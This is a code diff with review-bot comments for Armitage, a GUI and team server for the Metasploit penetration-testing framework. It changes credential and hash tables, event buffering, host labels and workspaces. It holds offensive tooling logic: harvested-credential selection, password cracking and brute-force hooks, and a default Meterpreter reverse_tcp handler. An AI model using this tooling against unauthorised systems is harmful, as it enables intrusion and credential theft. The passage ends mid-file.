[$sorter setComparator: 2, &compareHosts];
|
||||
[$table setRowSorter: $sorter];
|
||||
|
||||
refreshCredsTable($model, $1);
|
||||
if ($3) {
|
||||
refreshCredsTableLocal($model, $1);
|
||||
}
|
||||
else {
|
||||
refreshCredsTable($model, $1);
|
||||
}
|
||||
|
||||
$scroll = [new JScrollPane: $table];
|
||||
[$scroll setPreferredSize: [new Dimension: 480, 130]];
|
||||
|
@ -94,7 +125,7 @@ sub show_hashes {
|
|||
|
||||
sub createCredentialsTab {
|
||||
local('$dialog $table $model $panel $export $crack $refresh');
|
||||
($dialog, $table, $model) = show_hashes("", 320);
|
||||
($dialog, $table, $model) = show_hashes("", 320, 1);
|
||||
[$dialog removeAll];
|
||||
|
||||
addMouseListener($table, lambda({
|
||||
|
@ -131,7 +162,7 @@ sub createCredentialsTab {
|
|||
|
||||
$refresh = [new JButton: "Refresh"];
|
||||
[$refresh addActionListener: lambda({
|
||||
refreshCredsTable($model, $null);
|
||||
refreshCredsTableLocal($model, $null);
|
||||
}, \$model)];
|
||||
|
||||
$crack = [new JButton: "Crack Passwords"];
|
||||
|
@ -372,3 +403,34 @@ sub launchBruteForce {
|
|||
[$console start];
|
||||
}, $type => $1, $module => $2, $options => $3, $title => $4));
|
||||
}
|
||||
|
||||
sub credentialHelper {
|
||||
thread(lambda({
|
||||
[Thread yield];
|
||||
|
||||
# gather our credentials please
|
||||
local('$creds $cred @creds');
|
||||
$creds = call($mclient, "db.creds2", [new HashMap])["creds2"];
|
||||
foreach $cred ($creds) {
|
||||
if ($PASS eq "SMBPass" || $cred['ptype'] ne "smb_hash") {
|
||||
push(@creds, $cred);
|
||||
}
|
||||
}
|
||||
|
||||
# pop up a dialog to let the user choose their favorite set
|
||||
quickListDialog("Choose credentials", "Select", @("user", "user", "pass", "host"), @creds, $width => 640, $height => 240, lambda({
|
||||
if ($1 eq "") {
|
||||
return;
|
||||
}
|
||||
|
||||
local('$user $pass');
|
||||
$user = [$3 getSelectedValueFromColumn: $2, 'user'];
|
||||
$pass = [$3 getSelectedValueFromColumn: $2, 'pass'];
|
||||
|
||||
[$model setValueForKey: $USER, "Value", $user];
|
||||
[$model setValueForKey: $PASS, "Value", $pass];
|
||||
[$model fireListeners];
|
||||
}, \$callback, \$model, \$USER, \$PASS));
|
||||
}, \$USER, \$PASS, \$model, $callback => $4));
|
||||
}
|
||||
|
||||
|
|
|
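Review bot: the quickListDialog callback returns when $1 eq "", and $1 is the value of the lead column, 'user', so a stored credential with an empty user name can be listed but never applied. Test whether a row is selected rather than whether the user name is empty. The inner closure also captures \$callback (set from $callback => $4) without using it, and the column list @("user", "user", "pass", "host") needs a comment saying the first entry names the lead column rather than being a duplicate.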
@ -107,10 +107,10 @@ sub pivot_dialog {
|
|||
}
|
||||
|
||||
local('$dialog $model $table $sorter $center $a $route $button');
|
||||
$dialog = [new JDialog: $frame, $title, 0];
|
||||
$dialog = [new JDialog: $__frame__, $title, 0];
|
||||
[$dialog setSize: 320, 240];
|
||||
[$dialog setLayout: [new BorderLayout]];
|
||||
[$dialog setLocationRelativeTo: $frame];
|
||||
[$dialog setLocationRelativeTo: $__frame__];
|
||||
|
||||
[$dialog setLayout: [new BorderLayout]];
|
||||
|
||||
|
|
|
@ -182,28 +182,21 @@ sub queryData {
|
|||
[$progress setProgress: 30];
|
||||
}
|
||||
|
||||
# 4. clients
|
||||
%r['clients'] = call($mclient, "db.clients")["clients"];
|
||||
|
||||
if ($progress) {
|
||||
[$progress setProgress: 35];
|
||||
}
|
||||
|
||||
# 5. sessions...
|
||||
# 4. sessions...
|
||||
%r['sessions'] = fixSessions(call($mclient, "db.sessions")["sessions"]);
|
||||
|
||||
if ($progress) {
|
||||
[$progress setProgress: 36];
|
||||
}
|
||||
|
||||
# 6. timeline
|
||||
# 5. timeline
|
||||
%r['timeline'] = fixTimeline(call($mclient, "db.events")['events']);
|
||||
|
||||
if ($progress) {
|
||||
[$progress setProgress: 38];
|
||||
}
|
||||
|
||||
# 7. hosts and services
|
||||
# 6. hosts and services
|
||||
local('@hosts @services $temp $h $s $x');
|
||||
call($mclient, "armitage.prep_export", $1);
|
||||
|
||||
|
@ -291,32 +284,27 @@ sub _generateArtifacts {
|
|||
|
||||
[$progress setProgress: 65];
|
||||
|
||||
# 4. clients
|
||||
dumpData("clients", @("host", "created_at", "updated_at", "ua_name", "ua_ver", "ua_string"), %data['clients']);
|
||||
|
||||
[$progress setProgress: 70];
|
||||
|
||||
# 5. hosts
|
||||
# 4. hosts
|
||||
dumpData("hosts", @("address", "mac", "state", "address", "address6", "name", "purpose", "info", "os_name", "os_flavor", "os_sp", "os_lang", "os_match", "created_at", "updated_at"), %data['hosts']);
|
||||
|
||||
[$progress setProgress: 80];
|
||||
|
||||
# 6. services
|
||||
# 5. services
|
||||
dumpData("services", @("host", "port", "state", "proto", "name", "created_at", "updated_at", "info"), %data['services']);
|
||||
|
||||
[$progress setProgress: 90];
|
||||
|
||||
# 7. sessions
|
||||
# 6. sessions
|
||||
dumpData("sessions", @("host", "local_id", "stype", "platform", "via_payload", "via_exploit", "opened_at", "last_seen", "closed_at", "close_reason"), %data['sessions']);
|
||||
|
||||
[$progress setProgress: 93];
|
||||
|
||||
# 8. timeline
|
||||
# 7. timeline
|
||||
dumpData("timeline", @("source", "username", "created_at", "info"), %data['timeline']);
|
||||
|
||||
[$progress setProgress: 96];
|
||||
|
||||
# 9. take a pretty screenshot of the graph view...
|
||||
# 8. take a pretty screenshot of the graph view...
|
||||
[$progress setNote: "host picture :)"];
|
||||
|
||||
makeScreenshot("hosts.png");
|
||||
|
@ -330,7 +318,7 @@ sub _generateArtifacts {
|
|||
|
||||
fire_event_async("user_export", %data);
|
||||
|
||||
return getFileProper(dataDirectory(), formatDate("yyMMdd"), "artifacts");
|
||||
return getFileProper(dataDirectory(), formatDate("yyMMdd"), $DESCRIBE, "artifacts");
|
||||
}
|
||||
|
||||
#
|
||||
|
@ -368,8 +356,6 @@ sub api_export_data {
|
|||
}
|
||||
|
||||
sub initReporting {
|
||||
global('$poll_lock @events'); # set in the dserver, not in stand-alone Armitage
|
||||
|
||||
wait(fork({
|
||||
global('$db');
|
||||
[$client addHook: "armitage.export_data", &api_export_data];
|
||||
|
|
|
@ -35,9 +35,7 @@ sub result {
|
|||
sub event {
|
||||
local('$result');
|
||||
$result = formatDate("HH:mm:ss") . " $1";
|
||||
acquire($poll_lock);
|
||||
push(@events, $result);
|
||||
release($poll_lock);
|
||||
[$events put: $result];
|
||||
}
|
||||
|
||||
sub client {
|
||||
|
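Review bot: event() now calls [$events put: $result] with no lock, where the other version takes $poll_lock around the push. event() is called from the forked client threads, so this is safe only if armitage.ArmitageBuffer synchronizes put, get and free internally; say so in a comment here or at the allocation in main.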
@ -96,16 +94,6 @@ sub client {
|
|||
[[$handle getOutputStream] flush];
|
||||
}
|
||||
|
||||
# limit our replay of the event log to 100 events...
|
||||
acquire($poll_lock);
|
||||
if (size(@events) > 100) {
|
||||
$index = size(@events) - 100;
|
||||
}
|
||||
else {
|
||||
$index = 0;
|
||||
}
|
||||
release($poll_lock);
|
||||
|
||||
#
|
||||
# on our merry way processing it...
|
||||
#
|
||||
|
@ -183,33 +171,30 @@ sub client {
|
|||
else if ($method eq "armitage.log") {
|
||||
($data, $address) = $args;
|
||||
event("* $eid $data $+ \n");
|
||||
if ($address is $null) {
|
||||
$address = [$client getLocalAddress];
|
||||
}
|
||||
call_async($client, "db.log_event", "$address $+ // $+ $eid", $data);
|
||||
writeObject($handle, result(%()));
|
||||
}
|
||||
else if ($method eq "armitage.skip") {
|
||||
acquire($poll_lock);
|
||||
$index = size(@events);
|
||||
release($poll_lock);
|
||||
[$events get: $eid];
|
||||
writeObject($handle, result(%()));
|
||||
}
|
||||
else if ($method eq "armitage.poll" || $method eq "armitage.push") {
|
||||
acquire($poll_lock);
|
||||
if ($method eq "armitage.push") {
|
||||
($null, $data) = $args;
|
||||
foreach $temp (split("\n", $data)) {
|
||||
push(@events, formatDate("HH:mm:ss") . " < $+ $[10]eid $+ > " . $data);
|
||||
[$events put: formatDate("HH:mm:ss") . " < $+ $[10]eid $+ > " . $data];
|
||||
}
|
||||
}
|
||||
|
||||
if (size(@events) > $index) {
|
||||
$rv = result(%(data => join("", sublist(@events, $index)), encoding => "base64", prompt => "$eid $+ > "));
|
||||
$index = size(@events);
|
||||
}
|
||||
else {
|
||||
$rv = result(%(data => "", prompt => "$eid $+ > ", encoding => "base64"));
|
||||
}
|
||||
release($poll_lock);
|
||||
|
||||
$rv = result(%(data => [$events get: $eid], encoding => "base64", prompt => "$eid $+ > "));
|
||||
writeObject($handle, $rv);
|
||||
}
|
||||
else if ($method eq "armitage.lusers") {
|
||||
$rv = [new HashMap];
|
||||
[$rv put: "lusers", [$events clients]];
|
||||
writeObject($handle, $rv);
|
||||
}
|
||||
else if ($method eq "armitage.append") {
|
||||
|
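Review bot: in the armitage.push branch the loop foreach $temp (split("\n", $data)) never uses $temp; each iteration puts the whole of $data, so a message with n lines is queued n times in full. Put $temp, with its newline restored, instead of $data. In the armitage.log branch $address comes from the client's $args and is written to db.log_event as the event source whenever it is non-null; if the event log is meant to serve as an audit trail, derive the address on the server rather than trusting the caller.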
@ -308,6 +293,10 @@ sub client {
|
|||
$response = [$client execute: $method, cast($args, ^Object)];
|
||||
writeObject($handle, $response);
|
||||
}
|
||||
else if ($method eq "module.execute_direct") {
|
||||
$response = [$client execute: "module.execute", cast($args, ^Object)];
|
||||
writeObject($handle, $response);
|
||||
}
|
||||
else if ($method in %async) {
|
||||
if ($args) {
|
||||
[$client execute_async: $method, cast($args, ^Object)];
|
||||
|
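Review bot: module.execute_direct forwards straight to [$client execute: "module.execute", ...] with no comment on why a second entry point is needed. Name the caller that requires the unmodified call and what handling of module.execute it is meant to skip, so the method is not mistaken for a general-purpose alias.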
@ -333,6 +322,7 @@ sub client {
|
|||
|
||||
if ($eid !is $null) {
|
||||
event("*** $eid left.\n");
|
||||
[$events free: $eid];
|
||||
}
|
||||
|
||||
# reset the user's filter...
|
||||
|
@ -355,7 +345,7 @@ sub client {
|
|||
|
||||
sub main {
|
||||
global('$client $mclient');
|
||||
local('$server %sessions $sess_lock $read_lock $poll_lock $lock_lock %locks %readq $id @events $error $auth %cache $cach_lock $client_cache $handle $console');
|
||||
local('$server %sessions $sess_lock $read_lock $lock_lock %locks %readq $id $error $auth %cache $cach_lock $client_cache $handle $console $events');
|
||||
|
||||
$auth = unpack("H*", digest(rand() . ticks(), "MD5"))[0];
|
||||
|
||||
|
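Review bot: $auth, on the context line just below the changed local(), is derived from digest(rand() . ticks(), "MD5") and is then handed to every client thread in the fork call further down. A value built from rand() and a clock reading is guessable unless rand() is backed by a CSPRNG; generate it from java.security.SecureRandom instead. The changed local() line itself is fine: it drops $poll_lock and @events and adds $events, matching the buffer change.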
@ -403,9 +393,6 @@ sub main {
|
|||
# we need this global to be set so our reverse listeners work as expected.
|
||||
$MY_ADDRESS = $host;
|
||||
|
||||
# make sure clients know a team server is present. can't happen async.
|
||||
call($client, "core.setg", "ARMITAGE_TEAM", '1');
|
||||
|
||||
#
|
||||
# setup the client cache
|
||||
#
|
||||
|
@ -416,10 +403,12 @@ sub main {
|
|||
#
|
||||
$sess_lock = semaphore(1);
|
||||
$read_lock = semaphore(1);
|
||||
$poll_lock = semaphore(1);
|
||||
$lock_lock = semaphore(1);
|
||||
$cach_lock = semaphore(1);
|
||||
|
||||
# setup any shared buffers...
|
||||
$events = [new armitage.ArmitageBuffer: 250];
|
||||
|
||||
# set the LHOST to whatever the user specified (use console.write to make the string not UTF-8)
|
||||
$console = createConsole($client);
|
||||
call($client, "console.write", $console, "setg LHOST $host $+ \n");
|
||||
|
@ -427,6 +416,9 @@ sub main {
|
|||
# absorb the output of this command which is LHOST => ...
|
||||
call($client, "console.read", $console);
|
||||
|
||||
# update server's understanding of this value...
|
||||
call($client, "armitage.set_ip", $host);
|
||||
|
||||
#
|
||||
# create a thread to push console messages to the event queue for all clients.
|
||||
#
|
||||
|
@ -436,12 +428,10 @@ sub main {
|
|||
sleep(2000);
|
||||
$r = call($client, "console.read", $console);
|
||||
if ($r["data"] ne "") {
|
||||
acquire($poll_lock);
|
||||
push(@events, formatDate("HH:mm:ss") . " " . $r["data"]);
|
||||
release($poll_lock);
|
||||
[$events put: formatDate("HH:mm:ss") . " " . $r["data"]];
|
||||
}
|
||||
}
|
||||
}, \$client, \$poll_lock, \@events, \$console);
|
||||
}, \$client, \$events, \$console);
|
||||
|
||||
#
|
||||
# Create a shared hash that contains a thread for each session...
|
||||
|
@ -538,7 +528,7 @@ service framework-postgres start");
|
|||
$handle = [$server accept];
|
||||
if ($handle !is $null) {
|
||||
%readq[$id] = %();
|
||||
fork(&client, \$client, \$handle, \%sessions, \$read_lock, \$sess_lock, \$poll_lock, $queue => %readq[$id], \$id, \@events, \$auth, \%locks, \$lock_lock, \$cach_lock, \%cache, \$motd, \$client_cache, $_user => $user, $_pass => $pass);
|
||||
fork(&client, \$client, \$handle, \%sessions, \$read_lock, \$sess_lock, $queue => %readq[$id], \$id, \$events, \$auth, \%locks, \$lock_lock, \$cach_lock, \%cache, \$motd, \$client_cache, $_user => $user, $_pass => $pass);
|
||||
|
||||
$id++;
|
||||
}
|
||||
|
|
|
@ -21,6 +21,10 @@ sub getHostOS {
|
|||
return iff($1 in %hosts, %hosts[$1]['os_name'], $null);
|
||||
}
|
||||
|
||||
sub getHostLabel {
|
||||
return iff($1 in %hosts, %hosts[$1]['label'], $null);
|
||||
}
|
||||
|
||||
sub getSessions {
|
||||
return iff($1 in %hosts && 'sessions' in %hosts[$1], %hosts[$1]['sessions']);
|
||||
}
|
||||
|
@ -122,7 +126,7 @@ on sessions {
|
|||
}
|
||||
|
||||
if ($host['show'] eq "1") {
|
||||
push(@nodes, @($id, describeHost($host), showHost($host), $tooltip));
|
||||
push(@nodes, @($id, $host['label'] . "", describeHost($host), showHost($host), $tooltip));
|
||||
}
|
||||
}
|
||||
|
||||
|
@ -130,14 +134,14 @@ on sessions {
|
|||
}
|
||||
|
||||
sub refreshGraph {
|
||||
local('$node $id $description $icons $tooltip $highlight');
|
||||
local('$node $id $label $description $icons $tooltip $highlight');
|
||||
|
||||
# update everything...
|
||||
[$graph start];
|
||||
# do the hosts?
|
||||
foreach $node (@nodes) {
|
||||
($id, $description, $icons, $tooltip) = $node;
|
||||
[$graph addNode: $id, $description, $icons, $tooltip];
|
||||
($id, $label, $description, $icons, $tooltip) = $node;
|
||||
[$graph addNode: $id, $label, $description, $icons, $tooltip];
|
||||
}
|
||||
|
||||
# update the routes
|
||||
|
@ -189,6 +193,11 @@ on hosts {
|
|||
$address = $host['address'];
|
||||
if ($address in %hosts && size(%hosts[$address]) > 1) {
|
||||
%newh[$address] = %hosts[$address];
|
||||
|
||||
# set the label to empty b/c team server won't add labels if there are no labels. This fixes
|
||||
# a corner case where a user might clear all labels and find they won't go away
|
||||
%newh[$address]['label'] = '';
|
||||
|
||||
putAll(%newh[$address], keys($host), values($host));
|
||||
|
||||
if ($host['os_name'] eq "") {
|
||||
|
@ -258,7 +267,7 @@ sub _importHosts {
|
|||
}
|
||||
|
||||
$console = createDisplayTab("Import", $file => "import");
|
||||
[$console addCommand: $null, "db_import " . strrep(join(" ", $files), "\\", "\\\\")];
|
||||
[$console addCommand: 'x', "db_import " . strrep(join(" ", $files), "\\", "\\\\")];
|
||||
[$console addListener: lambda({
|
||||
elog("imported hosts from $success file" . iff($success != 1, "s"));
|
||||
}, \$success)];
|
||||
|
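Review bot: the db_import command is built by joining $files with spaces and escaping only backslashes, so a path that contains a space is split into two arguments and any other character the console treats specially passes through unescaped. Quote each path before joining. The change of the first addCommand argument from $null to 'x' also needs a comment saying what the token is used for.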
@ -342,8 +351,10 @@ sub clearHostFunction {
|
|||
}
|
||||
|
||||
sub clearDatabase {
|
||||
elog("cleared the database");
|
||||
call_async($mclient, "db.clear");
|
||||
if (!askYesNo("This action will clear the database. You will lose all information\ncollected up to this point. You will not be able toget it back.\nWould you like to clear the database?", "Clear Database")) {
|
||||
elog("cleared the database");
|
||||
call_async($mclient, "db.clear");
|
||||
}
|
||||
}
|
||||
|
||||
# called when a target is clicked on...
|
||||
|
|
|
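Review bot: the confirmation reads if (!askYesNo(...)), which is correct only because askYesNo returns 0 for Yes (manage_job tests $confirm eq "0" for the same reason); a comment or an explicit comparison with 0 would stop it being read as "clear when the user declines". The prompt text also has a typo: "able toget" should be "able to get".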
@ -151,6 +151,11 @@ sub createConsoleTab {
|
|||
}
|
||||
|
||||
sub setg {
|
||||
# update team server's understanding of LHOST
|
||||
if ($1 eq "LHOST") {
|
||||
call_async($client, "armitage.set_ip", $2);
|
||||
}
|
||||
|
||||
%MSF_GLOBAL[$1] = $2;
|
||||
local('$c');
|
||||
$c = createConsole($client);
|
||||
|
@ -159,12 +164,15 @@ sub setg {
|
|||
}
|
||||
|
||||
sub createDefaultHandler {
|
||||
warn("Creating a default reverse handler...");
|
||||
# setup a handler for meterpreter
|
||||
setg("LPORT", randomPort());
|
||||
local('$port');
|
||||
$port = randomPort();
|
||||
setg("LPORT", $port);
|
||||
warn("Creating a default reverse handler... 0.0.0.0: $+ $port");
|
||||
call_async($client, "module.execute", "exploit", "multi/handler", %(
|
||||
PAYLOAD => "windows/meterpreter/reverse_tcp",
|
||||
LHOST => "0.0.0.0",
|
||||
LPORT => $port,
|
||||
ExitOnSession => "false"
|
||||
));
|
||||
}
|
||||
|
@ -307,7 +315,12 @@ sub startMetasploit {
|
|||
savePreferences();
|
||||
}
|
||||
|
||||
$handle = [SleepUtils getIOHandle: resource("resources/msfrpcd.bat"), $null];
|
||||
if ("*apps*pro*" iswm $msfdir) {
|
||||
$handle = [SleepUtils getIOHandle: resource("resources/msfrpcd_new.bat"), $null];
|
||||
}
|
||||
else {
|
||||
$handle = [SleepUtils getIOHandle: resource("resources/msfrpcd.bat"), $null];
|
||||
}
|
||||
$data = join("\r\n", readAll($handle, -1));
|
||||
closef($handle);
|
||||
|
||||
|
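Review bot: the choice between msfrpcd_new.bat and msfrpcd.bat hinges on "*apps*pro*" iswm $msfdir, a wildcard match on the install path with no comment on which layout it is meant to detect. A user-chosen directory whose path happens to contain "apps" followed by "pro" selects the new script regardless of what is installed there. Test for a file that exists only in the new layout, or document the assumption next to the match.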
@ -373,7 +386,7 @@ sub connectDialog {
|
|||
$msfrpc_handle = $null;
|
||||
}
|
||||
|
||||
local('$dialog $host $port $ssl $user $pass $button $cancel $start $center $help $helper');
|
||||
local('$dialog $host $port $ssl $user $pass $button $start $center $help $helper');
|
||||
$dialog = window("Connect...", 0, 0);
|
||||
|
||||
# setup our nifty form fields..
|
||||
|
@ -390,8 +403,6 @@ sub connectDialog {
|
|||
$help = [new JButton: "Help"];
|
||||
[$help setToolTipText: "<html>Use this button to view the Getting Started Guide on the Armitage homepage</html>"];
|
||||
|
||||
$cancel = [new JButton: "Exit"];
|
||||
|
||||
# lay them out
|
||||
|
||||
$center = [new JPanel];
|
||||
|
@ -414,9 +425,14 @@ sub connectDialog {
|
|||
($h, $p, $u, $s) = @o;
|
||||
|
||||
[$dialog setVisible: 0];
|
||||
connectToMetasploit($h, $p, $u, $s);
|
||||
|
||||
if ($h eq "127.0.0.1" || $h eq "localhost") {
|
||||
if ($h eq "127.0.0.1" || $h eq "::1" || $h eq "localhost") {
|
||||
if ($__frame__ && [$__frame__ checkLocal]) {
|
||||
showError("You can't connect to localhost twice");
|
||||
[$dialog setVisible: 1];
|
||||
return;
|
||||
}
|
||||
|
||||
try {
|
||||
closef(connect("127.0.0.1", $p, 1000));
|
||||
}
|
||||
|
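Review bot: the local check compares $h against three literals, "127.0.0.1", "::1" and "localhost", so other loopback spellings (another 127.x address, a different letter case) skip both the checkLocal guard and the port probe. The probe still calls connect("127.0.0.1", $p, 1000) even when $h is "::1". Normalize the host once and probe the address the user actually entered.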
@ -426,37 +442,33 @@ sub connectDialog {
|
|||
}
|
||||
}
|
||||
}
|
||||
|
||||
connectToMetasploit($h, $p, $u, $s);
|
||||
}, \$dialog, \$host, \$port, \$user, \$pass)];
|
||||
|
||||
[$help addActionListener: gotoURL("http://www.fastandeasyhacking.com/start")];
|
||||
|
||||
[$cancel addActionListener: {
|
||||
[System exit: 0];
|
||||
}];
|
||||
|
||||
[$dialog pack];
|
||||
[$dialog setLocationRelativeTo: $null];
|
||||
[$dialog setVisible: 1];
|
||||
}
|
||||
|
||||
sub _elog {
|
||||
sub elog {
|
||||
local('$2');
|
||||
if ($client !is $mclient) {
|
||||
# $2 can be NULL here. team server will populate it...
|
||||
call_async($mclient, "armitage.log", $1, $2);
|
||||
}
|
||||
else {
|
||||
# since we're not on a team server, no one else will have
|
||||
# overwritten LHOST, so we can trust $MY_ADDRESS to be current
|
||||
if ($2 is $null) {
|
||||
$2 = $MY_ADDRESS;
|
||||
}
|
||||
call_async($client, "db.log_event", "$2 $+ //", $1);
|
||||
}
|
||||
}
|
||||
|
||||
sub elog {
|
||||
local('$2');
|
||||
if ($2 is $null) {
|
||||
$2 = $MY_ADDRESS;
|
||||
}
|
||||
|
||||
_elog($1, $2);
|
||||
}
|
||||
|
||||
sub module_execute {
|
||||
return invoke(&_module_execute, filter_data_array("user_launch", @_));
|
||||
}
|
||||
|
|
|
@ -33,7 +33,7 @@ sub listWorkspaces {
|
|||
$dialog = [new JPanel];
|
||||
[$dialog setLayout: [new BorderLayout]];
|
||||
|
||||
($table, $model) = setupTable("name", @("name", "hosts", "ports", "os", "session"), @());
|
||||
($table, $model) = setupTable("name", @("name", "hosts", "ports", "os", "labels", "session"), @());
|
||||
updateWorkspaceList($table, $model);
|
||||
[$table setSelectionMode: [ListSelectionModel MULTIPLE_INTERVAL_SELECTION]];
|
||||
|
||||
|
@ -88,15 +88,16 @@ sub workspaceDialog {
|
|||
local('$table $model');
|
||||
($table, $model) = $2;
|
||||
|
||||
local('$dialog $name $host $ports $os $button $session');
|
||||
local('$dialog $name $host $ports $os $button $session $label');
|
||||
$dialog = dialog($title, 640, 480);
|
||||
[$dialog setLayout: [new GridLayout: 6, 1]];
|
||||
[$dialog setLayout: [new GridLayout: 7, 1]];
|
||||
|
||||
$name = [new ATextField: $1['name'], 16];
|
||||
[$name setEnabled: $enable];
|
||||
$host = [new ATextField: $1['hosts'], 16];
|
||||
$ports = [new ATextField: $1['ports'], 16];
|
||||
$os = [new ATextField: $1['os'], 16];
|
||||
$label = [new ATextField: $1['labels'], 16];
|
||||
$session = [new JCheckBox: "Hosts with sessions only"];
|
||||
if ($1['session'] eq 1) {
|
||||
[$session setSelected: 1];
|
||||
|
@ -108,6 +109,7 @@ sub workspaceDialog {
|
|||
[$dialog add: label_for("Hosts:", 60, $host)];
|
||||
[$dialog add: label_for("Ports:", 60, $ports)];
|
||||
[$dialog add: label_for("OS:", 60, $os)];
|
||||
[$dialog add: label_for("Labels:", 60, $label)];
|
||||
[$dialog add: $session];
|
||||
|
||||
[$dialog add: center($button)];
|
||||
|
@ -116,15 +118,16 @@ sub workspaceDialog {
|
|||
|
||||
[$button addActionListener: lambda({
|
||||
# yay, we have a dialog...
|
||||
local('$n $h $p $o $s @workspaces $ws $temp');
|
||||
local('$n $h $p $o $s $l @workspaces $ws $temp');
|
||||
$n = [[$name getText] trim];
|
||||
$h = [strrep([$host getText], '*', '%', '?', '_') trim];
|
||||
$p = [[$ports getText] trim];
|
||||
$o = [strrep([$os getText], '*', '%', '?', '_') trim];
|
||||
$l = [[$label getText] trim];
|
||||
$s = [$session isSelected];
|
||||
|
||||
# save the new menu
|
||||
$ws = workspace($n, $h, $p, $o, $s);
|
||||
$ws = workspace($n, $h, $p, $o, $s, $l);
|
||||
@workspaces = workspaces();
|
||||
foreach $temp (@workspaces) {
|
||||
if ($temp["name"] eq $n) {
|
||||
|
@ -140,7 +143,7 @@ sub workspaceDialog {
|
|||
updateWorkspaceList($table, $model);
|
||||
|
||||
[$dialog setVisible: 0];
|
||||
}, \$dialog, \$host, \$ports, \$os, \$name, \$session, \$table, \$model)];
|
||||
}, \$dialog, \$host, \$ports, \$os, \$name, \$session, \$table, \$model, \$label)];
|
||||
}
|
||||
|
||||
sub reset_workspace {
|
||||
|
@ -199,16 +202,16 @@ sub set_workspace {
|
|||
}
|
||||
|
||||
sub workspace {
|
||||
return ohash(name => $1, hosts => $2, ports => $3, os => $4, session => $5);
|
||||
return ohash(name => $1, hosts => $2, ports => $3, os => $4, session => $5, labels => $6);
|
||||
}
|
||||
|
||||
sub workspaces {
|
||||
local('$ws @r $name $host $port $os $session $workspace');
|
||||
local('$ws @r $name $host $port $os $session $workspace $label');
|
||||
$ws = split("!!", [$preferences getProperty: "armitage.workspaces.menus", ""]);
|
||||
foreach $workspace ($ws) {
|
||||
if ($workspace ne "") {
|
||||
($name, $host, $port, $os, $session) = split('@@', $workspace);
|
||||
push(@r, workspace($name, $host, $port, $os, $session));
|
||||
($name, $host, $port, $os, $session, $label) = split('@@', $workspace);
|
||||
push(@r, workspace($name, $host, $port, $os, $session, $label));
|
||||
}
|
||||
}
|
||||
return @r;
|
||||
|
|
|
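Review bot: the sixth field `$label` is read back in `workspaces` with `split('@@', $workspace)` after the `!!` split, and the dialog stores the label text after only a `trim`, so a label containing `@@` or `!!` shifts or truncates the fields of the saved workspace. Reject those sequences in the dialog or escape them before the entry is written to `armitage.workspaces.menus`. Entries saved before this change have five fields, so `$label` comes back as `$null` for them; a comment saying that this is expected would help.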
@ -13,13 +13,32 @@ import cortana.gui.MenuBuilder;
|
|||
|
||||
import ui.*;
|
||||
|
||||
public class ArmitageApplication extends JFrame {
|
||||
public class ArmitageApplication extends JComponent {
|
||||
protected JTabbedPane tabs = null;
|
||||
protected JSplitPane split = null;
|
||||
protected JMenuBar menus = new JMenuBar();
|
||||
protected ScreenshotManager screens = null;
|
||||
protected KeyBindings keys = new KeyBindings();
|
||||
protected MenuBuilder builder = null;
|
||||
protected String title = "";
|
||||
protected MultiFrame window = null;
|
||||
|
||||
public KeyBindings getBindings() {
|
||||
return keys;
|
||||
}
|
||||
|
||||
public void setTitle(String title) {
|
||||
this.title = title;
|
||||
window.setTitle(this, title);
|
||||
}
|
||||
|
||||
public String getTitle() {
|
||||
return title;
|
||||
}
|
||||
|
||||
public void setIconImage(Image blah) {
|
||||
window.setIconImage(blah);
|
||||
}
|
||||
|
||||
public void setScreenshotManager(ScreenshotManager m) {
|
||||
screens = m;
|
||||
|
@ -192,10 +211,11 @@ public class ArmitageApplication extends JFrame {
|
|||
|
||||
/* pop goes the tab! */
|
||||
final JFrame r = new JFrame(t.title);
|
||||
r.setIconImages(getIconImages());
|
||||
//r.setIconImages(getIconImages());
|
||||
r.setLayout(new BorderLayout());
|
||||
r.add(t.component, BorderLayout.CENTER);
|
||||
r.pack();
|
||||
t.component.validate();
|
||||
|
||||
r.addWindowListener(new WindowAdapter() {
|
||||
public void windowClosing(WindowEvent ev) {
|
||||
|
@ -365,8 +385,20 @@ public class ArmitageApplication extends JFrame {
|
|||
component.requestFocusInWindow();
|
||||
}
|
||||
|
||||
public ArmitageApplication() {
|
||||
public void touch() {
|
||||
Component c = tabs.getSelectedComponent();
|
||||
if (c == null)
|
||||
return;
|
||||
|
||||
if (c instanceof Activity)
|
||||
((Activity)c).resetNotification();
|
||||
|
||||
c.requestFocusInWindow();
|
||||
}
|
||||
|
||||
public ArmitageApplication(MultiFrame f, String details, msf.RpcConnection conn) {
|
||||
super();
|
||||
window = f;
|
||||
tabs = new DraggableTabbedPane();
|
||||
setLayout(new BorderLayout());
|
||||
|
||||
|
@ -382,10 +414,8 @@ public class ArmitageApplication extends JFrame {
|
|||
/* add our tabbed pane */
|
||||
add(split, BorderLayout.CENTER);
|
||||
|
||||
/* setup our key bindings */
|
||||
KeyboardFocusManager.getCurrentKeyboardFocusManager().addKeyEventDispatcher(keys);
|
||||
|
||||
/* ... */
|
||||
setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
|
||||
//setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
|
||||
((ui.MultiFrame)window).addButton(details, this, conn);
|
||||
}
|
||||
}
|
||||
|
|
|
@ -0,0 +1,138 @@
|
|||
package armitage;
|
||||
|
||||
import java.util.*;
|
||||
|
||||
/*
|
||||
* Implement a thread safe store that any client may write to and
|
||||
* any client may read from (keeping track of their cursor into
|
||||
* the console)
|
||||
*/
|
||||
public class ArmitageBuffer {
|
||||
private static final class Message {
|
||||
public String message = null;
|
||||
public Message next = null;
|
||||
}
|
||||
|
||||
/* store our messages... */
|
||||
public Message first = null;
|
||||
public Message last = null;
|
||||
public long size = 0;
|
||||
public long max = 0;
|
||||
public String prompt = "";
|
||||
|
||||
/* store indices into this buffer */
|
||||
public Map indices = new HashMap();
|
||||
|
||||
/* setup the buffer?!? :) */
|
||||
public ArmitageBuffer(long max) {
|
||||
this.max = max;
|
||||
}
|
||||
|
||||
/* store a prompt with this buffer... we're not going to do any indexing magic for now */
|
||||
public String getPrompt() {
|
||||
synchronized (this) {
|
||||
return prompt;
|
||||
}
|
||||
}
|
||||
|
||||
/* set the prompt */
|
||||
public void setPrompt(String text) {
|
||||
synchronized (this) {
|
||||
prompt = text;
|
||||
}
|
||||
}
|
||||
|
||||
/* post a message to this buffer */
|
||||
public void put(String text) {
|
||||
synchronized (this) {
|
||||
/* create our message */
|
||||
Message m = new Message();
|
||||
m.message = text;
|
||||
|
||||
/* store our message */
|
||||
if (last == null && first == null) {
|
||||
first = m;
|
||||
last = m;
|
||||
}
|
||||
else {
|
||||
last.next = m;
|
||||
last = m;
|
||||
}
|
||||
|
||||
/* increment number of stored messages */
|
||||
size += 1;
|
||||
|
||||
/* limit the total number of past messages to the max size */
|
||||
